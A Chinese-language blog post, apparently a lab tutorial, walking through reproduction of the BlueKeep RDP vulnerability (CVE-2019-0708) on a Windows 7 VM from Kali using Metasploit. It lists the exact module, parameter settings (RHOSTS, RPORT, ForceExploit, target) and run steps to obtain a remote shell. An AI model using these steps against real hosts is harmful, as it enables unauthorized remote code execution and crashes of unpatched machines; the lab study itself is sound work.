您好,欢迎访问本站博客!登录后台查看权限
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏吧
  • 网站所有资源均来自网络,如有侵权请联系站长删除!

【原创】CVE-2019-0708漏洞复现

学习资料 末心网安 2020-04-14 41 次浏览 0个评论
网站分享代码
0x01前言:
  我们今天来学习一下CVE-2019-0708漏洞的复现,这个复现还是比较简单的。但是某dalao告诉我是看脸。
  我们使用的环境:
      VMware Workstation Pro15.5
Windows7SP1旗舰版(靶机)
Kali linux 2020.1(攻击机)
Windows10 2004 专业版(教程机)
0x02复现教程从此正式开始: 
执行:sudo msfconsole
输入管理员密码
然后进入msf
输入:search 0708 回车
我们需要使用exploit/windows/rdp/cve_2019_0708_bluekeep_rce这个exp框架

输入use exploit/windows/rdp/cve_2019_0708_bluekeep_rce回车(或者是use 3)
执行完成后,我们输入info,看下我们需要设置哪些参数。
我们需要设置RHOSTS,如果RPORT不是默认的3389,我们还需要设置它。然后我们需要设置target,设置的先后没有关系。

我们现在看靶机,取出靶机的外网IP:192.168.146.129
我们直接set rhosts 192.168.146.129 回车
setrport 3389 回车
setForceExploit true(这个从Freebuf上吸取的经验,可以杜绝一定程度的蓝屏)
我们设置一下target输入set target 5(因为我们的VMware版本是15.5,)

我们输入run或者exploit(自我感觉没什么区别)
既然这样提示了,也就是成功的证明了这台机子是存在漏洞的。后面还没有回显消息,我们先稍微等待一下。
我们已经看到了这样的情况,下面有两行空的,我们直接回车。
Ok,我们已经成功取得Shell。
成功回显信息,但是字符编码可能存在问题。
如果存在其他的问题,那就是target设置的问题或者是开了防火墙,可以尝试几次。
已知火绒会存在拦截。

如果没有取到shell,并且该机子存在0708漏洞,那机子就是蓝屏了~~~

----------------------------------
团队正在招收成员ing


已有 41 位网友参与,快来吐槽:

发表评论

验证码

https://blog.moxinwangluo.cn/zb_users/theme/filmlee/main.php?act=config